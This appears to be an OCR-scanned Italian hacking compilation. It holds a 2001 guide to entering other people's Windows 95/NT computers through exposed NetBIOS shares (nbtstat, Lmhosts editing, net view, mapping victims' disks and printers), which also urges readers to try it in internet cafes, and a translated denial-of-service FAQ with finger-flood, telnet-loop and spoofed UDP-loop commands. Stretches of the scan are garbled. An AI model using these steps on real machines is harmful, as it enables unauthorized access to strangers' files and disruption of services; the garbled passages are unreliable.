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Va bene!! Abbiamo giocato per un po' con il pc di uno sfigato che non sa che condividere le risorse è altamente 
rischioso quando ci si connette in internet e sopra tutto non sa che in giro ci sono balordi come noi. 
Ora però dovete sconnettervi, che fate?? Spegnete il computer, vi sconnettete da internet?? NO!! 


Andate ancora sul “Menu strumenti”, selezionate “Disconnetti unità di rete”. 
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Vi apparirà una finestra che non sto li a visualizzarvi, fate OK e dopo qualche istante siete sconnessi e pronti 
per entrare “in casa” di qualcun altro. 


A volte quando ci si sconnette Win ci da un messaggio dove ci avverte che la sconnessione 
può causare una perdita di dati. Questo perché probabilmente c'è ancora qualche bit che viaggia tra voi e l'altro 
pc, cliccate ancora OK e non preoccupatevi, al massimo vi si pianterà Windows. 


Altra piccola nota: esiste un “virus” che è in grado di far condividere tutte le risorse di un pc senza che l'utente 

si accorga di nulla (le risorse sono condivise ma non appare la famosa manina che le regge). 

Inoltre se esisteva una password è in grado di scavalcara, in più la condivisione che crea è in lettura/scrittura. 
Questo “virus” è stato partorito dalla mente di NEWFOLDER è non può essere individuato da nessun antivirus, 

in quanto ancora sconosciuto. La prima versione di esso era chiamata “SEXY”, per invogliare i più maldestri a 
lanciare il programma, la versione attuale non ve la dico per ovvi motivi e comunque è facile rinominarlo. 


Non so se da questa piccola guida avrete capito tutto, del resto nemmeno io ci sono ancora arrivato in fondo. 


Sappiate che in ogni caso conviene sempre stare attenti a quello che si combina in giro per la rete e sopra 
tutto ricordate che altri famosi e veri pirati sono stati beccati. 


Di certo non siete voi e tanto meno io i più furbi. 
Quindi quando muovete i passi sfruttando NETBIOS fatelo in punta di piedi, abbiate sempre un po' di paura, 


questo servirà a scoraggiarvi nel fare enormi cazzate. 


E ricordate anche questo particolare: “un giorno dall'altra parte potreste esserci VOI!“ 


FINE 


26/06/2001 Merrick68 
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COME INTROMETTERSI IN SISTEMI 95 O NT via tcp/ip, SFRUTTANDO IL COMANDO 
NBISTAT DI WINDOWS 95. 


Affinchè tutto funzioni bisogna avere tra i nostri componenti della rete 

il CLIENT PER RETI MICROSOFT e tra le impostazioni di quest'ultimo bisogna 
abilitare la "CONNESSIONE RAPIDA". 

Nella Connessione al provider dobbiamo anche attivare la casella di 

"Accedi alla rete". 


Innanzitutto occorre che i PC nei quali vogliamo entrare, abbiano il 

NETBIOS attivo sul protocollo TCP/IP. Per sapere cio' basta andare in un 
prompt di MS-Dos ed eseguire il comando NBTSTAT -A xxx.xxx.xxx.xxx (-A 
maiuscolo; xxx.xxx.xxx.xxx = numero ip della macchina su cui verificare se 

il NETBIOS è o meno attivo). (1) 


Ora abbiamo due possibilità: 

A) NETBIOS non è attivo sulla macchina remota e quindi non è possibile 
entrarci :( 

In questo caso l'output del comando NETSTAT -A xxx.xxx.xxx.xxx sarà: Host 
not found. 


B) NETBIOS è attivo e allora possiamo andare avanti. In questo caso 
l'output sarà qualcosa del genere: 


Name Type Status 
SERVER <00> UNIQUE Registered 
MEDIA SPAZIO <00> GROUP Registered 
SERVER <03> UNIQUE Registered 
SERVER <20> UNIQUE Registered 
MEDIA SPAZIO <1E> GROUP Registered 


*potrebbero esserci anche altre voci...... ma questo non ci 
interessa...... 


Se abbiamo trovato una macchina con il netbios attivo andiamo nella nostra 
directory \windows (o se avete installato windows in un'altra 

directory....in quella dove è installato) e cerchiamo il file Lmhosts. Se 

non è presente lo creeremo con il notepad. Ricordatevi di togliere 
l'eventuale estensione .txt quando lo salverete.... 


Attenzione: solitamente è presente un file chiamato Lmhosts.sam; è un 
esempio di come si fà il file Lmhosts.....ma non ce ne fotte nulla :))) 


Editiamo quindi il file Lmhosts in questo modo: 
XXX.XXX.XXX.XXxX <tab> Nome della macchina <tab> #PRE 


Il nome della macchina è il primo che troviamo con il comando NETSTAT -A 
XXX.XXX.XXX.XXxX; nel caso portato ad esempio è SERVER 


mettiamo che l'ip della macchina di cui sopra sia 194.210.123.11, 
scriveremo: 


194.210.123.11 SERVER #PRE 
usate la tabulazione per staccare le tre parti. 


Salvate nella directory di windows e ricordatevi di togliere l'eventuale 
estensione .txt 


Ora torniamo in Prompt di MSDos e scriviamo 

NBTSTAT -R 

dovremmo ricevere un messaggio di conferma 

Successful purge and preload of the NBT Remote Cache Name Table. 


altrimenti qualcosa non è andato bene.....probabilmente avete sbagliato 
qualcosa :) 


Ora dobbiamo solo sperare che il PC abbia delle risorse condivise: 
Dischi.....Stampanti.... 


Per saperlo scriviamo: net view \\Nome della macchina 
nel nostro esempio : net view \\SERVER 


se condivide qualcosa avremo l'elenco delle risorse condivise...una cosa 


del genere: 
Condivisione Tipo Commento 
COLORI Stampa 


DISCO SERVER — Disco 

RICOH-LASER Stampa 

Esecuzione comando riuscita. 

Se non condivide nulla possiamo anche cambiare obiettivo :( 

La macchina in questione condivide due stampanti ed un disco. 

Per condividere il disco andiamo in Risorse del Computer....e clicchiamo 
sulla barra degli strumenti (se non l'avete ancora attivata...che 
aspettate?!?!) sull'icona "Connetti unità di rete"; apparirà una finestra 
con UNITA' e PERCORSO. 

Lasciamo l'unità a quella che è, e digitiamo nel percorso cio' che segue: 
\\Nome della macchina\nome condivisione 


quindi nel nostro caso 


\\SERVER\DISCO SERVER (sempre rispettando maiuscole e minuscole) 


A questo punto verrà creata un'icona con la condivisione e cliccandoci 
sopra entreremo nel disco del computer remoto. Potremo sfogliarlo, copiare 
e nel caso non sia Read-only....scriverci. 


E' anche possibile condividere una stampante; per fare cio' andiamo nella 
cartella stampanti, clicchiamo aggiungi stampante, scegliamo STAMPANTE DI 
RETE, digitiamo il percorso della stampante....ad esempio nel nostro caso 
potrebbe essere \\SERVER\COLORI o \\SERVER\RICHO-LASER, 

scegliamo di non stampare la pagina di prova (per non rovinare l'effetto 
sorpresa) e confermiamo il tutto. 

A questo punto il PC scaricherà i drivers direttamente dal PC 
REMOTO........potrebbero volerci una decina di minuti, e il pc sembrerà 
bloccato......... ma non lo è; attendete pazientemente e quando avrà 
finito.....potrete scrivere un bel file con il msg: 


HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI,SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 
HACKERATI,SIETE STATI HACKERATI, SIETE STATI HACKERATI,SIETE STATI 


o quello che volete :))) e stamparlo sulla stampante remota.....immaginate 
la sorpresa:) 


So che è difficile che le condizioni affichè cio' funzioni si verifichino 
tutte insieme......ma 

con il programmino apposito (1).....sarebbe tutto abbastanza piu' 
semplice.....e cmq....provate sugli intenet cafe'...ad esempio; io ieri ne 


(1) sarebbe utile a tal fine un programma che esegua NBTSTAT -A su un 
range di ip. E qui un'appello ai programmatori del SOFT PROJECT; se avete 
voglia e tempo....non sarebbe male..... con un po' d'impegno potrei farlo 

pure io......ma non verrebbe sicuramente altrettanto bene :)) 


PS. Un saluto a tutti quelli di #hackers.it (IRCNET) e a tutti i 
componenti del SOFT PROJECT... con i quali mi scuso per non aver potuto 
portare avanti il progetto iniziato. 


PsPs.: se ti manca il file vnbt.386 (causa protect winnuke 00B) che 
controlla il netbios non funge niente e devi provvedere!!! 


PsPsPs.: se ti rompi di fare tutto cio' vai su www.volftp.tin.it e sulla 
casella search metti msdun 
sarebbe un aggiornamento di accesso remoto (in inglese) che ti permettera' 


di accedere a un computer 
mettendo semplicemente l'ip numerico della persona in trova computer che 
sta nel menu avvio (trova) 


.0. PREFAZIONE 


.A. INTRODUZIONE 


A. 
A_.2. 


A3. 


COS'è UN ATTACCO DENIAL OF SERVICE? 
PERCHè QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA? 
.A.2.1. INTRODUZIONE 
.A.2.2.STATO SOTTOCULTURALE 
.A.2.3. PER GUADAGNARE L'ACCESSO 
.A.2.4. VENDETTA 
.A.2.5. RAGIONI POLITICHE 
.A.2.6. RAGIONI ECONOMICHE 
.A.2.7. CATTIVERIA 
ALCUNI SISTEMI OPERATIVI SONO PIù SICURI? 


.B. ALCUNI OBBIETTIVI DI BASE PER UN ATTACCO 


BAL: 
.B.2. 
.B.3. 
.B.4. 
.B.5. 
.B.6. 
Ba. 


SPAZIO SWAP 
FREQUENZA 

TAVOLE DEL KERNEL 
RAM 

DISCHI 

CACHE 

INETD 


.C. ATTACCARE DALL'ESTERNO 


.C.1. 
CZ: 
.C.3. 
.C.4. 
.C.5. 
.C.6. 
5C:7. 
0.8; 
«9: 


.C.10. 
GAI, 
.C.12. 
.C.13. 
.C.14. 
.C.15. 
.C.16. 
7. 
.C.18. 
.C.19. 
.C.20. 
.C.21. 


AVERE PROFITTO CON IL FINGER 
UDP E SUNOS 4.1.3. 

BLOCCARE X-WINDOWS 

USO MALIZIOSO DEI SERVIZI UDP 
ATTACCARE CONICLIENTS LYNX 
USO MALIZIOSO DI telnet 

USO MALIZIOSO DI telnet SU SOLARIS 2.4 
COME DISABILITARE GLI ACCOUNTS 
LINUX E TCP TIME, DAYTIME 

COME DISABILITARE I SERVIZI 
PARAGON OS BETA R1.4 

FTP DI NOVELLS NETWARE 
ATTACCHI CON REINDIRIZZAMENTO DI ICMP 
TEMPESTE DI BROADCAST 

EMAIL BOMBING E SPAMMING 
TIME E KERBEROS 

IL BUG DOT DOT 

SUNOS KERNEL PANIC 

APPLESTS OSTILI 

VIRUS 

ABUSO DI FTP ANONIMO 


.C.22. SYN FLOOD 

.C.23. PING FLOOD 

.C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95 

.C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK 
.C.26. FLEXlm 

.C.27. PARTIRE CON FTP BANALI 


.D. ATTACCARE DALL'INTERNO 
.D.1. KERNEL PANIC SOTTO SOLARIS 2.3 
.D.2. BLOCCARE IL SERVER X 
.D.3. RIEMPIRE L'HARD DISK 
.D.4. USO MALIZIOSO DI eval 
.D.5. USO MALIZIOSO DI fork() 
.D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE 
.D.7. DIRECTORY NAME LOOKUPCACHE 
.D.8. ATTACCO CSH 
.D.9. CREARE FILES IN /tmp 
.D.10. USARE RESOLV_HOST_CONF 
.D.11. SUN 4.X E LAVORI NASCOSTI 
.D.12. MANDARE IN CRASH DG/UX CON ULIMIT 
.D.13. NETTUNE E HP-UX 
.D.14. SOLARIS 2.X E NFS 
.D.15. STABILITà DEL SISTEMA COMPROMESSA CON MOUNT_UNION 
.D.16. trap _ mon CAUSA IL KERNEL PANIC SOTTO SUNOS 4.1.X 


.E. DUMPING CORE 
.E.1. BREVE COMMENTO 
.E.2. USO MALIZIOSO DI NETSCAPE 
.E.3. CORE DUMPED SOTTO WUFTPD 
.E.4. ld SOTTO SOLARIS/X86 


.F. COME PROTEGGO UN SISTEMA DAGLI ATTACCHI DENIAL OF SERVICE? 
.F.1. PROTEZIONI DI BASE 
.F.1.1. INTRODUZIONE 
.F.1.2. PORT SCANNING 
.F.1.3. CONTROLLA GLI ATTACCHI DALL'ESTERNO DESCRITTI 
.F.1.4. CONTROLLA GLI ATTACCHI DALL'INTERNO DESCRITTI 
.F.1.5. SISTEMI DI MASSIMA SICUREZZA 
.F.1.6. CONTROLLARE LA SICUREZZA 
.F.1.7. MANTENERE AGGIORNATO 
.F.1.8. LEGGERE QUALCOSA DI MEGLIO 
.F.2. CONTROLLARE LE PRESTAZIONI 
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.-H. COPYRIGHT 
I. DISCLAIMER 


.0. PREFAZIONE 


In questo documento ho cercato di rispondere alle seguenti domande: 


- Cos'è un attacco denial of service? 

- Perchè qualcuno dovrebbe mandare in crash un sistema? 

- Come si manda in crash un sistema? 

- Come proteggo un sistema da un attacco denial of service? 


C'è anche una sezione chiamata LETTURE SUGGERITE dove puoi trovare 
suggerimenti su informazioni gratuite che ti potrebbero fornire una 
conoscenza più dettagliata su qualcosa. 


Ricorda che ho un'esperienza limitata con Macintosh, 05/2 e Windows 
e la maggior parte del materiale è quindi per Unix. 


Puoi trovare sempre le versioni più aggiornate al seguente indirizzo: 
http://www.student.tdb.uu.se/>t95hhu/secure/denial/DENIAL.TXT 
[NdT logicamente i testi sono in inglese] 


Per commenti, suggerimenti e altro a: 
t95hhu@student.tdb.uu.se 


.A. INTRODUZIONE 


latta tia tie tia *Ie®ia®T vie tIa0ie0ia®Te®ietTeaviovi 


Denial of service quando si mettono fuori uso i servizi, per 
esempio attraverso il crash dell'intero sistema. Questi tipi 

di attacchi sono semplici da eseguire ed è difficile proteggere 
un sistema contro di essi. Il problema di base è che Unix 
presume che gli utenti sul sistema o su altri sistemi sanno 
come comportarsi. 


.A.2. PERCHè QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA? 


Perchè qualcuno dovrebbe mandare in crash un sistema? Ci sono molti 
motivi e ho presentato essi in maniera più specifica in una sezione 
per ogni motivo, ma in sintesi: 


.1. Introduzione 

.2. Stato sottoculturale 

.3. Per guadagnare l'accesso 
.4. Vendetta 

.5. Ragioni politiche 

.6. Ragioni economiche 

.7. Cattiveria 


Penso che il primo e il sesto sono i più comuni oggi, ma che il quarto 
e il quinto saranno i più comuni in futuro. 


.A.2.2.STATO SOTTOCULTURALE 


Dopo tutte le informazioni sul syn flood molti di tali attacchi 
erano eseguiti dalla Svezia. La stragrande maggioranza di questi 
attacchi non erano una parte di un attacco IP-spoof, erano "solo" 
un attacco denial of service. Perchè? 


Penso che gli hackers attaccano i sistemi per una pseudo-carriera 
sottoculturale e penso che molti attacchi denial of service, e quì 
nell'esempio il syn flood, erano eseguiti per questo motivo. Penso 
anche che molti hackers cominciano la loro carriera con attacchi 
denial of service. 


.A.2.3. PER GUADAGNARE L'ACCESSO 


A volte un attacco denial of service potrebbe essere una parte di un 
attacco per guadagnare l'accesso in un sistema. Al] momento posso 
pensare questo motivo e specificare i metodi: 


.1. Qualche vecchia versione di x-lock potrebbe essere mandata 
in crach con un metodo preso dalla famiglia dei denial of service 
lasciando il sistema aperto. L'accesso fisico era necessario per 
usare lo spazio di lavoro. 


.2. Syn flood potrebbe essere una parte di un attacco IP-spoof. 


.3. Alcuni programmi di sistema potrebbero avere buchi all'avvio, 
che potrebbero essere usati per avere l'accesso root, per esempio 
SSH (secure shell). 


.4. Sotto un attacco potrebbe essere utile mandare in crash altre 
macchine nella rete o negare ad alcune persone l'abilità di accedere 
al sistema. 


.5. Inoltre un sistema potrebbe essere avviato a volte in modo 
sovvertito, specialmente nei rarp-boots. Se sappiamo quale porta 
controlla il sistema (69 potrebbe essere un buon indizio) all' 


avvio possiamo mandare falsi pacchetti e controllare quasi 
totalmente l'avvio. 


.A.2.4. VENDETTA 


Un attacco denial of service potrebbe essere una parte di una vendetta 
contro un utente o un amministratore. 


.A.2.5. RAGIONI POLITICHE 


Prima o poi vecchie e nuove organizzazioni capiranno il modo di 
distruggere computer di sistemi e troveranno strumenti per farlo. 


Per esempio immagina la Banca A che presta dei soldi alla Compagnia B 
per costruire una fabbrica che minaccia l'ambiente. 

L'organizzazione C quindi manda in crash il computer di sistema di A, 
forse con l'aiuto di un impiegato. L'attacco potrebbe costare ad A una 
grande quantità di denaro se il tempismo è giusto. 


.A.2.6. RAGIONI ECONOMICHE 


Immagina la piccola compagnia A che si muove in un mercato dominato 
totalmente dalla compagnia B. I clienti di A e B fanno gli ordini dai 

computers e dipendono pesantemente sull'orario che è stato effettuato (A 

e B potrebbero essere compagnie di scambio). Se A e B non possono effettuare 
l'ordine i clienti perdono tempo e cambiano compagnia. 


Come parte di strategia di mercato A paga un esperto di computer per mandare 
in crash i computers di B un numero di volte. Un anno dopo A è la compagnia 
dominante. 


.A.2.7. CATTIVERIA 


Conosco una persona che trova una workstation dove l'utente si è dimenticato 
di uscire. Questa persona si siede e scrive un programma che fa un kill -9 -1 
a tempo indeterminato per almeno 30 minuti dopo il tempo di entrata e ha 
piazzato una chiamata a un programma dal suo file di profilo. Questa è 
cattiveria. 


.A.3. ALCUNI SISTEMI OPERATIVI SONO PIù SICURI? 


Questa è una domanda difficile a cui è difficile rispondere e non penso 
che sarà data qualcosa per confrontare differenti piattaforme Unix. 
Non puoi dire che un Unix è più sicuro di un altro contro i denial of 
service, tutto dipende dall'amministratore. 


Un confronto tra Windows 95 e NT da un lato e Unix e gli altri può 
essere comunque interessante. 


I sistemi Unix sono molto più complessi e hanno centinaia di programmi 
integrati, servizi... Questo spesso apre molte vie per mandare in crash 
il sistema dall'interno. 


Nella normale rete Windows NT e 95 ci sono pochi modi per mandare in 
crash il sistema. Comunque ci sono dei metodi che funzionano sempre. 


Questo ci dice che non c'è una grande differenza tra Microsoft e Unix 
per quanto riguarda gli attacchi dall'interno. Ma ci sono un paio di 
punti: 


- Unix ha molti più strumenti e programmi per scoprire un 
attacco e controllare gli utenti. Per vedere cosa fa un 
utente in windows è molto difficile. 


- Gli amministratori medi di Unix probabilmente hanno molta 
più esperienza degli amministratori medi di Microsoft. 


Questi due punti ci dicono che Unix è più sicuro contro gli attacchi 
denial of service dall'interno. 


Un confronto tra Microsoft e Unix per quanto riguarda gli attacchi 
dall'esterno è molto più difficile. Comunque vorrei dire che i sistemi 
medi Microsoft su Internet è più sicuro contro gli attacchi dall'esterno, 
perchè normalmente hanno molti meno servizi. 


.B. ALCUNI OBIETTIVI DI BASE PER UN ATTACCO 


NINNI NINNI NINNI NINNI NINNI NINNI NANNINI A 


.B.1. SPAZIO SWAP 


La maggior parte dei sistemi hanno molte centinaia di Mbytes 
di spazio swap per le richieste di servizio dei clients. Lo 
spazio swap è usato tipicamente per una paio di processi che 
hanno breve vita. Lo spazio swap non sarà quasi mai molto 
usato. Un denial of service potrebbe essere basato su un 
metodo che cerca di riempire lo spazio swap. 


.B.2. FREQUENZA 


Se la frequenza è troppo alta la rete non sarà più utilizzabile. La 
maggior parte degli attacchi denial of service influenzano la 
frequenza in alcuni casi. 


.B.3. TAVOLE DEL KERNEL 


E' banale traboccare le tavole del kernel che causeranno 
seri problemi al sistema. I sistemi con cache vuota e piccoli 
buffers buoti sono particolarmente sensibili. 


L'allocazione di memoria del kernlel è anche un obietivo che è 
sensibile. Il kernel ha un limite di kernelmap, se il sistema 

supera questo limite non può essere più allocata memoria del 
kernel e si deve riavviare la macchina. La memoria del kernel non 
è usata solo per la RAM, CPU, schermi, e così via, è anche usata 
per processi ordinari. Questo significa che ogni sistema può 
essere mandato in crash e con un cattivo (o in alcuni casi buono) 
algoritmo abbastanza veloce. 


Per Solaris 2.X è misurato e riportato con il comando sar quanta 
memoria del kernel sta usando il sistema, ma per SunOS 4.X non c'è 
quel comando. Ciò significa che sotto SunOS 4.X non avrai un avviso. 
Se usi Solaris devi scrivere sar -k 1 per avere le informazioni. 

netstat -k può essere usato e mostra quanta memoria il kernel ha 
allocata. 


Un attacco denial of service che alloca una grande quantità di RAM 

può causare una grande quantità di problemi. I servers NFS e di posta 

sono attualmente estremamente sensibili perchè non hanno bisogno di 
molta RAM e spesso non hanno molta RAM. Un attacco a un server NFS è 
banale. Il normale client NFS farà una grande quantità di caching, 

ma un clent NFS può includere comunque il programma che hai scritto 
tu... 


.B.5. DISCHI 


Un attacco classico è riempire l'hard disk, ma un attacco ai dischi 
può fare molto di più. Per esempio un disco sovraccaricato può essere 
manomesso in molti modi. 


.B.6. CACHE 


Un attacco denial of service che coinvolge la cache può essere basato 
su un metodo per bloccare la cache o per annullarla. 


Queste cache sono trovte su Solaris 2.X: 
Directory name lookup cache: Associa il nome di un file con un vnode. 


Inode cache: Deposita le informazioni lette da un disco se sono ancora 
necessarie. 


Rnode cache: Raccoglie informazioni sul filsystem NFS. 
Buffer cache: Collega i blocchi e i cilindri con il disco I/O. 


.B.7. INETD 


Una volta che inetd è andato in crash tutti gli altri servizi che 
sono eseguiti attraverso inetd non funzioneranno più. 


.C. ATTACCARE DALL'ESTERNO 


latta tiatia tia *Ie0ia*Te®ie0iaSie*Ta*ie*Ta*Tetie vi avi avTeci aci e*TatTeSTacNTaviIovI 


La maggior parte delle installazioni del fingerd supportano i 
reindirizzamenti agli altri gost. 


Es: 
$finger @system.two.com@system.one.com 


il finger nell'esempio andrà attraverso system.one.com a system.two.com. 
Così system.two.com sa che è system.one.com che fa il finger. Così 
questo metodo può essere usato per nascondersi, ma anche per 

un attacco denial of service. Guarda quì: 


$ finger 
AAAALAAALdAAA@AdAAAAdAAALdCACdLdCCFC@AE€€€€@host.we.attack 


Tutti quei segni @ faranno un finger a host.we.attack una, due, tre 

... Volte. L'effetto su host.we.attack è potente e il risultato è 

grande frequenza, poca memoria libera e hard disk con poco spazio libero, 
dovuto a tutti i processi figli (confronta con .D.5.). 


La soluzione è installare un fingerd che non supporta i reindirizzamenti, 
per esempio GNU finger. Puoi anche eliminare il servizio finger, ma penso 
che è un po' troppo. 


.C.2. UDP E SUNOS 4.1.3. 


SunOS 4.1.3. si avvia se un pacchetto con un'informazione non corretta 
nell'header è mandata ad esso. Questa è 1 causa se l'ip_options indica 
una dimensione sbagliata del pacchetto. 

La soluzione è di installare la patch appropriata. 


.C.3. BLOCCARE UP X-WINDOWS 


Se un host accetta una sessione telnet alla porta di X-Windows 
(generalmente una porta tra 6000 e 6025. Nella maggior parte dei casi 
6000) potrebbe essere usata per bloccare il sistema X-Windows. Questo 
può essere fatto con molte connessioni telnet alla porta o con un 
programma che manda molti XOpenDisplay() alla porta. 


La stessa cosa può accadere a Motif o Open Windows. 
La soluzione è di negare le connessioni alla porta X-Windows. 


.C.4. USO MALIZIOSO DEI SERVIZI UDP 


E' semplice avere i servizi UDP (echo, time, daytime, chargen) da 
far andare in loop, a causa di banali IP-spoofing. L'effetto può 
essere alta frequenza che causa l'inutilità della rete. Nell'esmpio 
l'header richiede che il pacchetto viene da 127.0.0.1 (loopback) e 
l'obiettivo è la porta echo di system.we.attack. Siccome 
system.we.attack conosce 127.0.0.1 il collegamento è stato stabilito. 


Es: 


from-IP=127.0.0.1 
to-IP=system.we.attack 
Packet type:UDP 

from UDP port 7 

to UDP port 7 


Nota che il nome system.we.attack sembra un nome DNS, ma l'obiettivo 
dovrebbe essere sempre rappresentato dall'IP. 


Citazione dal commento di proberts@clark.net (Paul D. Robertson) su 
comp.security.firewalls sul tema di "Introduzione ai denial of service" 


" Una grande quantità di sistemi non mettono loopback sulla rete, 
e semplicemente li emulano. Quindi, questo attacco avrà l'effetto 
desiderato sulla macchina solo in alcuni casi. E' molto meglio 
usare l'indirizzo di una differente macchina sulla stessa rete. 
Ancora, i servizi standard dovrebbero essere disabilitati in 
inetd.conf. Altri attacchi per stacks di IP che non supportano 
ICMP, il servizio echo non è usato da molti programmi, e TCP 
echo dovrebbe essere usato al posto di UDP dove è necessario ". 


.C.5. ATTACCARE CON CLIENTS LYNX 


Un server Worold Wide Web inforcherà un processo httpd come una 
risposta a una richiesta da un client, spesso Netscape o Mosaic. 
Il processo dura meno din un secondo e il caricamento non sarà 


mai mostrato se qualcuno usa ps. Nella maggior parte dei casi è 
comunque sicuro eseguire un attacco denial of service che usa molti 
clients W3, di solito clients lynx. Ma nota che il comando netstat 
potrebbe essere usato per rintracciare l'attacco (grazie a Paul D. 
Robertson). 


Alcuni httpd (per esempio http-gw) hanno problemi normalmente con la 
frequenza alta, poca memoria... E l'attacco può in quei casi far andare in 
loop il server. (confronta con .C.6.) 


.C.6. USO MALIZIOSO DI telnet 


Studia questo piccolo script: 


while : ; do 
telnet system.we.attack & 
done 


Un attacco che usa questo script potrebbe mangiare della frequenza, 
ma non ha niente a che vedere con il metodo finger o altri metodi. 
Il punto è che alcuni comuni firewall e httpd pensano che l'attacco 
è un loop e lo annullano, fino a che l'amministratore non manda un 
kill -HUP. 


Questa è una semplice vulnerabilità ada alto rischio che dovrebbe 
essere controllata e se presente riparata. 


.C.7. USO MALIZIOSO DI telnet SU SOLARIS 2.4 


Se l'attacco fa una connessione telnet all'host Solaris 2.4 e quit 
sì usa: 


Control-} 
quit 


inetd lo terrà per sempre. Un paio di centinaia... 
La soluzione è installare la patch appropriata. 


.C.8. COME DISABILITARE GLI ACCOUNTS 


Alcuni sistemi disabilitano un account dopo alcune login sbaglite, o 
aspettano alcuni secondi. Tu puoi usare questa funzione per cacciare 
gli utenti dal sistema. 


.C.9. LINUX E TCP TIME, DAYTIME 


Si sa che inetd sotto Linux va in crach se troppo pacchetti SYN sono 
mandati a daytime (porta 13) e/o a time (porta 37). 


La soluzione è installare la patch appropriata. 


.C.10. COME DISABILITARE I SERVIZI 


La maggior parte dei sistemi Unix disabilitano i servizi dopo un certo 
numero di sessioni aperte in un certo periodo di tempo. La maggior parte 
dei sistemi hanno uno standard ragionevole (diciamo 800-1000), ma non 
alcuni sistemi SunOS che hanno lo standard a 48... 


La soluzione è settare il numero in qualcosa di ragionevole. 


.C.11. PARAGON OS BETA R1.4 


Se qualcuno reindirizza un pacchett ICMP (Internet Control Message Protocol) 
a un paragon OS beta R1.4 la macchina si bloccherà e deve essere riavviata. 
Un reindirizzo di ICMP dice al sistema di sostituire le tavole di routing. 

I router usano questo per dire all'host che sta mandando il pacchetto a un 
router sbagliato. 


La soluzione è installare la patch appropriata. 


.C.12. FTP DI NOVELLS NETWARE 


Il server FTP di Novells Netware è conosciuto poichè la memoria si riduce 
se ci sono molte sessioni ftp connesse. 


.C.13. ATTACCHI CON REINDIRIZZAMENTO DI ICMP 


Le Gateways usano il reindirizzamento di ICMP per dire al sistema di cambiare 
le tavole di routing, cioè sta dicendo al sistema di prendere una via migliore. 

Per manomettere il reindirizzo degli ICMP dobbiamo conoscere una connessione 
esistente (ne possiamo creare una per noi stessi, ma non c'è molto utilizzo 

per quella). Se abbiamo trovato una connessione noi possiamo mandare un flusso 
che gli fa perdere la connessione o potremmo mandare falsi messaggio all'host 
se la connesione che abbiamo trovato non cripta i pacchetti. 


Es: (messaggio falso da mandare) 
DESTINATION UNREACHABLE 
TIME TO LIVE EXCEEDED 
PARAMETER PROBLEM 
PACKET TOO BIG 


L'effetto di tale messaggio è il blocco della connessione. 


La soluzione potrebbe essere disabilitare il reindirizzamento di ICMP, non 
usato propriamente dal servizio. 


.C.14. TEMPESTE DI BROADCAST 


Questo è un metodo molto popolare nelle reti dove tutti gli host agiscono 
come gateways. 


Ci sono molte versioni dell'attacco, ma il metodo di base è mandare molti 
pacchetti a tutti gli host nella rete con una destinazione che non esiste. 

Ogni host cercherà di inoltrare ogni pacchetto così i pacchetti rimbalzeranno 
per molto tempo. E se si aggiungono i nuovi pacchetti alla rete, la rete 

sarà nei guai. 


I servizi che possono essere manomessi e utilizzati in questo tipo di attacco 
sono per esempio il ping, il finger e il sendmail. Ma possono essere manomessi 
la maggior parte dei servizi in un modo o nell'altro. 


.C.15. EMAIL BOMBING E SPAMMING 


In un attacco email bombing l'attaccante manderà ripetutamente identici messaggi 
email a un indirizzo. L'effetto sull'obiettivo è alta frequenza, un hard disk con poco 
spazio e così via... L'email spamming è quando si mandano delle mail a tutti (0 
quasi) gli utenti del sistema. Il motivo per il quale si usa lo spamming al posto 

del bombing è che alcuni utenti cercano di mandare una risposta e se l'indirizzo 

è falso, la mail tornerà indietro. In quel caso una mail si è trasformata in tre 

mail. L'effetto sulla frequenza è ovvio. 


Non c'è modo di prevenire un email bombing o spamming. Comunque dai un'occhiata 
al documento della CERT "Email bomginb and spamming". 


.C.16. TIME E KERBEROS 


Se le macchine sorgente e obiettivo sono allineate da vicino il biglietto verrà 
respinto, ciò significa che se il protocollo che setta il tempo è protetto sarà 
possibile settare un server kerberos. 


.C.17. IL BUG DOT DOT 


Il sistema di condivisione file di Windows NT è vulnerabile al famoso bug dot dot 
sotto Windows 95. Ciò significa che chiunque può mandare in crash il sistema. Se 
qualcuno manda un "DIR ..\" alla workstation un messaggio di STOP apparirà sullo 
schermo del computer Windows NT. Nota che è applicabile alle versioni 3.50 e 3.51 
per le versioni sia workstation che server. 


La soluzione è installare la patch appropriata. 


.C.18. KERNEL PANIC DEL SUNOS 


Alcuni sistemi SunOS (che eseguono TIS?) avranno un kernel panic se è mandato un 
getsockopt(). La connessione così sarà interrotta. 


La soluzione potrebbe essere installare la Sun Patch 100804. 


.C.19. APPLETS OSTILI 


Una applet ostile è quando un applet cerca di usare il tuo sistema in un modo 
inappropriato. I problemi nel linguaggio java potrebbero essere ordinati in due 
grandi gruppi: 


1) Problemi dovuti ai bugs. 
2) Problemi dovuti a caratteristiche nel linguaggio. 


Nel primo gruppo abbiamo per esempio il bug java bytecode verifier, che permette a 
un'applet di eseguire tutti i comandi che un utente potrebbe eseguire. Ciò significa 
che tutti i metodi di attacco descritti in .D.X. possono essere seguiti attraverso 
un'applet. Il bug java bytecode verifier fu scoperto a fine Marzo 1996 e non ci sono 
patch disponibili (correggetemi se sbaglio!). 

[NdT siccome il documento è un po' vecchio, probabilmente ora esiste una patch per 
questo bug] 


Nota che due altri bugs possono essere inseriti nel primo gruppo ma sono entrambi 
riparati in Netscape 2.01 e JDK 1.0.1. 


Il gruppo due è più interessante e una grande problema è il fatto che java può 
connettersi alle porte. Ciò significa che tutti i metodi descritti in .C.X. possono 
essere eseguiti da un'applet. Maggiori informazioni ed esempio possono essere 
trovati all'indirizzo: 


http://www.math.gatech.edu/>mladue/HostileArticle.html 


Se hai bisogno di un maggior livello di sicurezza usa dei firewall che proteggono 
da java. Come utente, dovresti aver disabilitato java. 


.C.20. VIRUS 


I virus per il computer sono scritti allo scopo di distruggere e propagare i sistemi. 
